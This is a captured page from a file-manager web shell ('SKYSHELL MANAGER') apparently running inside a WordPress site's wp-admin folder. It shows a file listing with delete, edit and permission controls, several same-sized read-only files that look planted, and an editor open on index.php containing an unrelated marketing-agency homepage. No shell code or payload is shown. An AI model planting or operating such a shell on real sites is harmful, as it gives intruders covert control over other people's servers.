📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.php
<!DOCTYPE html> <html lang="en"> <head> <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-96H8279GPC"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-96H8279GPC'); </script> <title>Dotnix</title> <link rel="icon" href="image/favi.ico" type="image/favi.ico"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="css/bootstrap.min.css"> <script src="js/jquery.min.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> <link href='https://fonts.googleapis.com/css?family=Raleway' rel='stylesheet'> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Raleway:wght@900&display=swap" rel="stylesheet"> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/js/bootstrap.bundle.min.js"crossorigin="anonymous"></script> <link rel="stylesheet" type="text/css" href="css/slick-theme.css" /> <link rel="stylesheet" type="text/css" href="css/slick.css" /> <script type="text/javascript" src="js/slick.min.js"></script> <style> body { font-family: 'Raleway', sans-serif; } img{max-width: 100%;} </style> <style type="text/css"> html { scroll-behavior: smooth; } .navbar .megamenu{ padding: 1rem; } </style> <style> .fixedElement { position:fixed; top:0; width:100%; z-index:100; } .ms-auto{margin-left:auto!important} </style> <style> @media only screen and (min-width: 937px) { .navbar .has-megamenu{position:static!important;} .navbar .megamenu{left:0; right:0; width:100%; margin-top:0; padding: 50px 338px 50px 338px; } .navbar-dark .navbar-nav .nav-link{padding: 55px 20px 27px 20px;} .navbar-dark .navbar-nav .nav-link:hover{padding: 55px 20px 20px 20px;} .space0{padding-top: 150px;} .space1{margin-top: 175px;} .space2{margin-left:260px;} .fit{object-fit: cover;height: 650px;width: 100%;} h1 {color: #070503; font-weight: 900; line-height: 120%; padding-bottom: 35px; letter-spacing: -1px;} .h1,h1{font-size:4.5rem} .big1{text-align:left;font-size:2rem;font-weight: 500;line-height: 1.3;} .h2,h2{font-size: 3.2em;font-weight: 900;line-height: 120%;padding-bottom: 35px;letter-spacing: -1px;text-align: center;} .h3,h3{font-size: 3.2em;font-weight: 900;line-height: 120%;padding-bottom: 35px;letter-spacing: -1px;} .h4,h4{font-size: 2.2em;font-weight: 900;line-height: 120%;padding-bottom: 15px;letter-spacing: -1px;} .cust-name {line-height: .2;} .cust-profession {line-height: .2;} .log2{float:right;} .space5{padding-top:80px;} .space6{margin-top:60px;} .borders{line-height:142%} .vline{border-right: 1px solid #cecece;} } @media screen and (max-width: 937px) { .navbar.fixed-top .navbar-collapse, .navbar.sticky-top .navbar-collapse{ overflow-y: auto; max-height: 90vh; margin-top:10px;} .big1{text-align:left;font-size:2rem;font-weight: 500;} .space1{margin-top: 75px;} .btn-primary {padding: 10px 20px 10px 20px;} .navbar-collapse{padding-left:15px;} .space4{padding-bottom:30px;} .log{padding-left: 15px;width: 180px;} .log1{display:none;} .space5{padding-top:0px;} .space6{margin-top:0px;} .mscroll {height: 200px; max-height: 200px; width: 100%; overflow-y: scroll; -webkit-overflow-scrolling:touch; // mobile safari} .borders{line-height:164%} } </style> <style> @media (max-width:991.98px) { .padding { padding: 1.5rem } } @media (max-width:767.98px) { .padding { padding: 1rem } } .padding { padding: 5rem } .card { position: relative; display: flex; width: 350px; flex-direction: column; min-width: 0; word-wrap: break-word; background-color: #fff; background-clip: border-box; border: 1px solid #d2d2dc; border-radius: 11px; -webkit-box-shadow: 0px 0px 5px 0px rgb(249, 249, 250); -moz-box-shadow: 0px 0px 5px 0px rgba(212, 182, 212, 1); box-shadow: 0px 0px 5px 0px rgb(161, 163, 164) } .card .card-body { border-radius: 10px; background-color:#3da2c7; padding: 1rem 1rem; } .card-body { flex: 1 1 auto; padding: 1.25rem } p { font-size: 0.875rem; margin-bottom: .5rem; line-height: 1.5rem } .profile { margin-top: 16px; margin-left: 11px } .profile-pic { width: 58px } .cust-name { font-size: 18px; } .cust-profession { font-size: 10px; } .items { padding-top:30px; width: 100%; margin: 0px auto; } .slick-slide { margin: 10px } </style> <style> .column1 { width: 30%; } @media screen and (max-width: 600px) { .column1 { width: 100%; display: block; margin-bottom: 10px; } } /* Style the counter cards */ .card1 { padding: 16px; background-color: #dadada; } .card1:hover {box-shadow: -11px 11px 0px 0px #773589;} </style> <style> .column2 { width: 25%; } @media screen and (max-width: 600px) { .column2 { width: 100%; display: block; margin-bottom: 10px; } } /* Style the counter cards */ .card2 { padding: 16px; background-color: #3da2c7; margin: 0px 5px 10px 5px; } .border1{ padding-top: 0px; /* height: 15px; */ margin-bottom: 45px; margin-top: 6px; } .bor{ width: 138px; height: 12px; margin-bottom: 45px; } </style> <script> var a = 0; $(window).scroll(function() { var oTop = $('#counter').offset().top - window.innerHeight; if (a == 0 && $(window).scrollTop() > oTop) { $('.counter-value').each(function() { var $this = $(this), countTo = $this.attr('data-count'); $({ countNum: $this.text() }).animate({ countNum: countTo }, { duration: 2000, easing: 'swing', step: function() { $this.text(Math.floor(this.countNum)); }, complete: function() { $this.text(this.countNum); //alert('finished'); } }); }); a = 1; } }); </script> <script type="text/javascript"> document.addEventListener("DOMContentLoaded", function(){ /////// Prevent closing from click inside dropdown document.querySelectorAll('.dropdown-menu').forEach(function(element){ element.addEventListener('click', function (e) { e.stopPropagation(); }); }) }); // DOMContentLoaded end </script> <script> $(document).ready(function(){ $('.items').slick({ dots: true, infinite: true, speed: 800, autoplay: true, autoplaySpeed: 2000, slidesToShow: 4, slidesToScroll: 4, responsive: [ { breakpoint: 1024, settings: { slidesToShow: 3, slidesToScroll: 3, infinite: true, dots: true } }, { breakpoint: 600, settings: { slidesToShow: 2, slidesToScroll: 2 } }, { breakpoint: 480, settings: { slidesToShow: 1, slidesToScroll: 1 } } ] }); }); </script> </head> <body> <!-- <header class="section-header py-4"> <div class="container"> <h2>Demo page </h2> </div> </header> section-header.// --> <!-- ============= COMPONENT ============== --> <div class="fixedElement"> <nav class="navbar navbar-expand-lg navbar-dark bg-primary"> <div class="container"> <a class="navbar-brand" href="index.php"><img class="log" src="image/dot.png"></a> <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#main_nav" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse mscroll" id="main_nav"> <ul class="navbar-nav ms-auto"> <li class="nav-item active"> <a class="nav-link" href="index.php">Home </a> </li> <li class="nav-item"><a class="nav-link" href="services/about-us.php"> About Us</a></li> <!--li class="nav-item"><a class="nav-link" href="services/email-marketing-strategy.php"> Our Process </a></li--> <li class="nav-item dropdown has-megamenu"> <a class="nav-link dropdown-toggle" href="#" data-bs-toggle="dropdown"> Services </a> <div class="dropdown-menu megamenu" role="menu"> <div class="row"> <!--div class="col-sm-3"> <div class="col-megamenu"> <h5 class="title" style="color: #230000;">Email Marketing Strategy</h5> <ul class="list-unstyled"> <p>Email should be a part of any digital marketing campaign, helping brands reach large swathes of potential customers quickly and easily. </p> <li><a href="services/email-marketing-strategy.php">Learn more</a></li> </ul> </div> </div><!-- end col-3 --> <!--div class="col-sm-3"> <div class="col-megamenu"> <h5 class="title" style="color: #230000;">Web Development</h5> <ul class="list-unstyled"> <p>We create fast, responsive, and visually appealing websites tailored to your business needs. Our focus is on performance, user experience, and modern design. </p> </ul> </div> </div><!-- end col-3 --> <div class="col-sm-3"> <div class="col-megamenu"> <h5 class="title" style="color: #230000;">Digital Marketing Strategy</h5> <ul class="list-unstyled"> <p>Digital marketing strategy is a plan that outlines how your business will achieve its marketing goals via online channels like search and social media.</p> <li><a href="services/digital-marketing-strategy.php">Learn more</a></li> </ul> </div> <!-- col-megamenu.// --> </div><!-- end col-3 --> <!--div class="col-sm-3"> <div class="col-megamenu"> <h5 class="title" style="color: #230000;">Email Campaign Management</h5> <ul class="list-unstyled"> <p>Dotnix email campaign management services include everything from asset email launches and drip campaigns to email nurturing and analytics.</p> <li><a href="services/digital-marketing-strategy.php">Learn more</a></li> </ul> </div> </div --> <div class="col-sm-3"> <div class="col-megamenu"> <h5 class="title" style="color: #230000;">Social Media Strategy</h5> <ul class="list-unstyled"> <p>Our process for social is similar to our approach to marketing in general: track > test > tweak > repeat. Simply put,</p> <li><a href="services/social-media-strategy.php">Learn more</a></li> </ul> </div> <!-- col-megamenu.// --> </div><!-- end col-3 --> </div><!-- end row --> </div> <!-- dropdown-mega-menu.// --> </li> <li class="nav-item"><a class="nav-link" href="services/contact.php"> Contact Us</a></li> </ul> </div> <!-- navbar-collapse.// --> </div><!-- container-fluid.// --> </nav> </div> <div class="container-fluid py-2 space1"> <div class="row align-items-center"> <div class="col-auto"> <a class="h1" href="#carouselExampleControls" role="button" data-slide="prev"> <span>⟨</span> </a> </div> <div class="col" style="padding-left:0px;padding-right:0px;"> <div id="carouselExampleControls" class="carousel slide" data-ride="carousel"> <div class="carousel-inner" style="padding-bottom: 3px;"> <!--div class="carousel-item active"> <div class="row align-items-center"> <div class="col-md py-2"> <h1 class="space2"> Email Marketing Has Been Around Forever</h1> <h2 class="space2 big1">Email marketing helps you connect with your audience to promote your brand and increase sales.</h2> <a href="services/first-digital-marketing-strategy.php" class="btn btn-primary space2">Learn more <span style="font-size:20px;"> ⟶<span> </a> </div> <div class="col-md py-2"> <img class="d-block img-fluid fit" src="image/dsl1.jpg" alt="First slide" style="box-shadow: -11px 11px 0px 0px #773589;"> </div> </div> </div--> <div class="carousel-item active"> <div class="row align-items-center"> <div class="col-md py-2"> <h1 class="space2"> Digital Marketing Strategy Template</h1> <h2 class="space2 big1">Manage all your team's work in one place and improve accountability.</h2> <a href="services/digital-marketing-strategy.php" class="btn btn-primary space2">Learn more <span style="font-size:20px;"> ⟶<span> </a> </div> <div class="col-md py-2"> <img class="d-block img-fluid fit" src="image/dsl2.jpg" alt="First slide" style="box-shadow: -11px 11px 0px 0px rgb(0, 204, 255);"> </div> </div> </div> <div class="carousel-item"> <div class="row align-items-center"> <div class="col-md py-2"> <h1 class="space2"> Crafting A Digital Advertising Plan</h1> <h2 class="space2 big1">One of our biggest challenges as digital marketers is traffic.</h2> </div> <div class="col-md py-2"> <img class="d-block img-fluid fit" src="image/dsl4.jpg" alt="First slide" style="box-shadow: -11px 11px 0px 0px rgb(255, 102, 0);"> </div> </div> </div> <div class="carousel-item"> <div class="row align-items-center"> <div class="col-md py-2"> <h1 class="space2"> Designing Your Search Marketing Strategy</h1> <h2 class="space2 big1">Testing the value of keywords for SEO with an SEM campaign.</h2> </div> <div class="col-md py-2"> <img class="d-block img-fluid fit" src="image/dsl5.png" alt="First slide" style="box-shadow: -11px 11px 0px 0px #773589;"> </div> </div> </div> <div class="carousel-item"> <div class="row align-items-center"> <div class="col-md py-2"> <h1 class="space2"> Developing a Social Media Strategy</h1> <h2 class="space2 big1"> Increase brand awareness · Build engaged communities · Sell products and services</h2> <a href="services/social-media-strategy.php" class="btn btn-primary space2">Learn more <span style="font-size:20px;"> ⟶<span> </a> </div> <div class="col-md py-2"> <img class="d-block img-fluid fit" src="image/dsl3.png" alt="First slide" style="box-shadow: -11px 11px 0px 0px rgb(0, 204, 255);"> </div> </div> </div> </div> </div> </div> <div class="col-auto"> <a class="h1" href="#carouselExampleControls" role="button" data-slide="next" style="a:hover"> <span>⟩</span> </a> </div> </div> </div> <div class="container-fluid" style="padding-top:80px;background: #efecd9;"> <div class="container"> <h3 style="color:#230000">OUR GEO’S</h3> <div class="row" id="counter"> <div class="col-sm-6"> <h4 class="borders" style="padding-bottom:0px;padding-top:10px;margin-bottom:0px;"><span style="box-shadow: -7px 0 0 6px #006680, 7px 0 0 6px #006680;background-color: #006680;color:#f6f6f6;">UNITED STATES OF AMERICA</span></h4> <div class="bor" style="background-color:#00ccff;"></div> <h4 class="borders" style="padding-bottom:0px;margin-bottom:0px;"><span style="box-shadow: -7px 0 0 6px #773589, 7px 0 0 6px #773589;background-color: #773589;color:#f6f6f6;">EUROPE</span></h4> <div class="bor" style="background-color:#3da2c7;"></div> <h4 class="borders" style="padding-bottom:0px;margin-bottom:0px;"><span style="box-shadow: -7px 0 0 6px #803300, 7px 0 0 6px #803300;background-color: #803300;color:#f6f6f6;">UNITED KINGDOM</span></h4> <div class="bor" style="background-color:#ff6600;"></div> <h4 class="borders" style="padding-bottom:0px;margin-bottom:0px;"><span style="box-shadow: -7px 0 0 6px #006680, 7px 0 0 6px #006680;background-color: #006680;color:#f6f6f6;">AUSTRALIA</span></h4> <div class="bor" style="background-color:#00ccff;"></div> </div> <div class="col-sm-6"> <div class="row"> <div class="col-sm-6"> <div class="counter-Txt vline" style="padding-right:20px;"> <h4><span class="counter-value" data-count="10" >1</span><span>M+</span></h4> <p>Media spend is something that we manage monthly for ads on different platforms and social networking sites.</p></div> </div> <div class="col-sm-6"> <div class="counter-Txt" style="padding-right:20px;"> <h4><span class="counter-value" data-count="1000" >100</span><span>+</span></h4> <p>Digital templates we produce every month, from clients all over the world.</p></div> </div> </div> <div class="row space6"> <div class="col-sm-6"> <div class="counter-Txt vline" style="padding-right:20px;padding-left:0px;"> <h4><span class="counter-value" data-count="5000" >1000</span><span>+</span></h4> <p>We are promoting the product and business sale to our clients.</p></div> </div> <div class="col-sm-6"> <div class="counter-Txt" style="padding-left:0px;padding-right:20px;"> <h4><span class="counter-value" data-count="600" >100</span><span>+</span></h4> <p>Campaigns we schedule every month for our clients with 99.9% accuracy.</p></div> </div> </div> </div> </div> </div> </div> <div class="container" style="padding-top:80px;padding-bottom:80px;"> <div class="container"><h2 style="color:#230000">What We Do?</h2></div> <div class="row"> <div class="column1" style="margin-left:20px;margin-right:20px;"> <div class="card1"> <img src="image/s1.svg" style="padding-bottom:10px;padding-top:20px;"> <h4>Digital<br> Marketing</h4> </div> </div> <div class="column1" style="margin-left:20px;margin-right:20px;"> <div class="card1"> <img src="image/s5.svg" style="padding-bottom:10px;padding-top:20px;"> <h4>Search Engine Optimization</h4> </div> </div> <div class="column1" style="margin-left:20px;margin-right:20px;"> <div class="card1"> <img src="image/s3.svg" style="padding-bottom:10px;padding-top:20px;"> <h4>Digital Template Production</h4> </div> </div> </div> <div class="row" style="margin-top:40px;"> <div class="column1" style="margin-left:20px;margin-right:20px;"> <div class="card1"> <img src="image/s4.svg" style="padding-bottom:10px;padding-top:20px;"> <h4>Campaign Management</h4> </div> </div> <div class="column1" style="margin-left:20px;margin-right:20px;"> <div class="card1"> <img src="image/s2.svg" style="padding-bottom:10px;padding-top:20px;"> <h4>Digital Automation & Journey</h4> </div> </div> <div class="column1" style="margin-left:20px;margin-right:20px;"> <div class="card1"> <img src="image/s6.svg" style="padding-bottom:10px;padding-top:20px;"> <h4>Blogger Outreach / Link Building</h4> </div> </div> </div> </div> <div class="container-fluid" style="padding-top:80px;padding-bottom:80px;background: #414240;"> <div class="container"> <h2 style="color:#f6f6f6">Why Choose Us?</h2> <div class="row"> <div class="column2"> <div class="card2"> <h5>Qualitative Services</h5> <p>Quality is the first and foremost ethic we follow.</p> </div> <div class="card2"> <h5>Quick Turnaround Time</h5> <p>That’s something we can bet on without compromising quality.</p> </div> </div> <div class="column2"> <div class="card2"> <h5>Well-documented NDA</h5> <p>You can trust us with data confidentiality and intellectual project rights.</p> </div> <div class="card2"> <h5>Dedicated Project Manager</h5> <p>We make communications easier with a single point of contact.</p> </div> </div> <div class="column2"> <div class="card2"> <h5>Scalable Operations</h5> <p>When it comes to resources - you’ll always have enough.</p> </div> <div class="card2"> <h5>Agency-Centric Processes</h5> <p>We follow your agency processes to match your goals.</p> </div> </div> <div class="column2"> <div class="card2"> <h5>Global Client Base</h5> <p>We have more than 7,000+ happy clients across the globe.</p> </div> <div class="card2"> <h5>Industry-led Practices</h5> <p>Equipped with Industry-leading tools and software.</p> </div> </div> </div> </div> </div> <div class="container-fluid" style="padding-bottom:40px;padding-top:80px;background: #efecd9;"> <div class="container"><h2 style="color:#230000">What Do Our Clients Have to Say?</h2> <div class="items"> <div class="card"> <div class="card-body"> <h4 class="card-title"><img src="image/qu.png"></h4> <div class="template-demo"> <p>We are very pleased to say Dotnix delivered results and consequently, we saw marked improvements with overall traffic performance. The level of professionalism and transparency displayed by Dotnix has been impressive work.</p> </div> <hr> <div class="row"> <!--<div class="col-sm-2"> <img class="profile-pic" src="image/profile.png"> </div>--> <div class="col-sm-12"> <div class="profile"> <h4 class="cust-name">Delbert Simonas</h4> <p class="cust-profession">Washington</p> </div> </div> </div> </div> </div> <div class="card"> <div class="card-body"> <h4 class="card-title"><img src="image/qu.png"></h4> <div class="template-demo"> <p>Dotnix worked diligently on our campaigns and strategically optimised our web listings, which ultimately increased our user engagement. They analysed our objectives and implemented strategies that proved fruitful for the brand. </p> </div> <hr> <div class="row"> <div class="col-sm-12"> <div class="profile"> <h4 class="cust-name">Rob Hester</h4> <p class="cust-profession">San Antonio</p> </div> </div> </div> </div> </div> <div class="card"> <div class="card-body"> <h4 class="card-title"><img src="image/qu.png"></h4> <div class="template-demo"> <p>SEO experts of Dotnix have helped our business generate a high amount of organic traffic & ROI from our primary focus keywords along with the consistent rankings on page one of Google. I surely recommend these outstanding professionals.</p> </div> <hr> <div class="row"> <div class="col-sm-12"> <div class="profile"> <h4 class="cust-name">Malachi Lensing</h4> <p class="cust-profession">Melbourne</p> </div> </div> </div> </div> </div> <div class="card"> <div class="card-body"> <h4 class="card-title"><img src="image/qu.png"></h4> <div class="template-demo"> <p>Great Digital Marketing, product promotions & Increase our business scale, Dotnix has a great team in account management and communication. It's lovely to meet & work with these guys</p> </div> <hr> <div class="row"> <div class="col-sm-12"> <div class="profile"> <h4 class="cust-name">Christian Isla</h4> <p class="cust-profession">switzerland</p> </div> </div> </div> </div> </div> <div class="card"> <div class="card-body"> <h4 class="card-title"><img src="image/qu.png"></h4> <div class="template-demo"> <p>Amazing product promotions and timing deliver offers and deals to our clients. We seen our business growth in digital marketing. Thanks to your amazing work keep it up guys.</p> </div> <hr> <div class="row"> <div class="col-sm-12"> <div class="profile"> <h4 class="cust-name">Lori Charles</h4> <p class="cust-profession">Cornwall</p> </div> </div> </div> </div> </div> </div> </div> </div> <!--div class="container space5" style="padding-bottom:80px;"> <h2 style="color:#230000">Get Updated Blogs</h2> <div class="row"> <div class="col-sm-4 " style="padding: 0px 35px 0px 35px;"> <img src="image/blog1.jpg" style="width: 100%;box-shadow: -11px 11px 0px 0px rgb(255 102 0);"> <div class="space4" style="padding-top:30px;"> <h4>What happens after you hit send</h4> <p>When a marketer hits send, an email’s journey has just begun. Before an email reaches its final destination,</p> <a href="blog/what-happens -after-you-hit-send.php">Learn more</a> </div> </div> <div class="col-sm-4 " style="padding: 0px 35px 0px 35px;"> <img src="image/blog2.jpg" style="width: 100%;box-shadow: -11px 11px 0px 0px rgb(0 204 255);"> <div class="space4" style="padding-top:30px;"> <h4>How do you measure email success?</h4> <p>When a marketer hits send, an email’s journey has just begun. Before an email reaches its final destination,</p> <a href="blog/how-do-you-measure-email-success.php">Learn more</a> </div> </div> <div class="col-sm-4" style="padding: 0px 35px 0px 35px;"> <img src="image/blog3.jpg" style="width: 100%;box-shadow: -11px 11px 0px 0px #773589;"> <div style="padding-top:30px;"> <h4>Debunking common email myths</h4> <p>When a marketer hits send, an email’s journey has just begun. Before an email reaches its final destination,</p> <a href="blog/debunking-common-email-myths.php">Learn more</a> </div> </div> </div> </div--> <div class="container-fluid " style="padding-top:40px;padding-bottom:40px;background: #773589;color:#f6f6f6;"> <div class="container"> <h3 style="padding-bottom:10px;">Contact Us</h3> <p style="font-size:18px;">Any questions? <a href="services/contact.php" style="color:#f6f6f6;"><b>Get in touch with us</b><span style="font-size:20px;"> ⟶<span></a></p> </div> </div> <div class="container-fluid " style="padding-top:40px;padding-bottom:40px;background: #3da2c7;color:#f6f6f6;"> <div class="container"> <div class="row"> <div class="col-sm-6"> <h3 style="padding-bottom:10px;">Our Newsletter</h3> <p style="font-size:18px;">Your Go-to Intelligence Resource for the Scholarly Publishing Industry</p> </div> <div class="col-sm-6"> <a href="#0" style="background-color: #773589;border-color: #3da2c7;margin-bottom: 0px;border-radius: 1000px;padding: 20px 30px 20px 30px;font-size: 1.1em;font-weight: 500;display: inline-block;position: relative;width: auto;color: #fff;margin-top: 30px;">Subscribe Us <span style="font-size:20px;"> ⟶<span> </a> </div> </div> </div> </div> <div class="container-fluid" style="padding-top:80px;padding-bottom:80px;background: #fff;"> <div class="container"> <div class="row"> <div class="col-sm-3"> <h5>Digital Marketing</h5> <p><a href="#0" style="color:#232323;">Search Engine Optimization</a></p> <p><a href="#0" style="color:#232323;">Social Media Marketing</a></p> <p><a href="#0" style="color:#232323;">Pay Per Click</a></p> <p><a href="#0" style="color:#232323;">Blogging</a></p> <p><a href="#0" style="color:#232323;">Digital Marketing</a></p> </div> <div class="col-sm-3"> <h5>Our Services</h5> <!--p><a href="services/first-digital-marketing-strategy.php" style="color:#232323;">Digital Marketing Strategy</a></p--> <p><a href="services/digital-marketing-strategy.php" style="color:#232323;">Digital Marketing Strategy</a></p> <p><a href="services/digital-marketing-strategy.php" style="color:#232323;">Digital Campaign Management</a></p> <p><a href="services/social-media-strategy.php" style="color:#232323;">Social Media Strategy</a></p> </div> <div class="col-sm-3"> <h5>Information</h5> <p><a href="#" style="color:#232323;">Careers</a></p> <p><a href="services/privacy.php" style="color:#232323;">Privacy Policy</a></p> <p><a href="services/terms.php" style="color:#232323;">Terms & Conditions</a></p> <p><a href="#" style="color:#232323;">Support</a></p> <p><a href="#" style="color:#232323;">Reach Us</a></p> <p><a href="#" style="color:#232323;">Subscribe</a></p> </div> <div class="col-sm-3"> <img class="log1" src="image/dot.png" width="50%" style="float:right;"> <p class="log2" style="font-family: arial, helvetica, sans-serif;color: #282828;font-size: 12px;padding-top:20px;">© Copyright 2025 All Rights Reserved</p> </div> </div> </div> </div> <script> function megaMenu(){ $('.megamenu .dropdown').click('show.bs.dropdown', function (e) { var $dropdown = $(this).find('.dropdown-menu'); var orig_margin_top = parseInt($dropdown.css('margin-top')); $dropdown.css({ 'margin-top': (orig_margin_top + 65) + 'px', opacity: 0 }).animate({ 'margin-top': orig_margin_top + 'px', opacity: 1 }, 420, function () { $(this).css({ 'margin-top': '' }); }); }); } $(function(){ "use strict"; // Navigation megaMenu(); $(".navbar-toggle").on("click", function () { $(this).toggleClass("active"); }); }); (function ($) { "use strict"; var header = $("#header"); $(window).scroll(function () { if ($(this).scrollTop() > 50) { header.addClass("sticky"); $(".navbar").addClass("fixed"); } else { header.removeClass("sticky"); $(".navbar").removeClass("fixed"); } }); })(jQuery); </script> </body> </html>
Save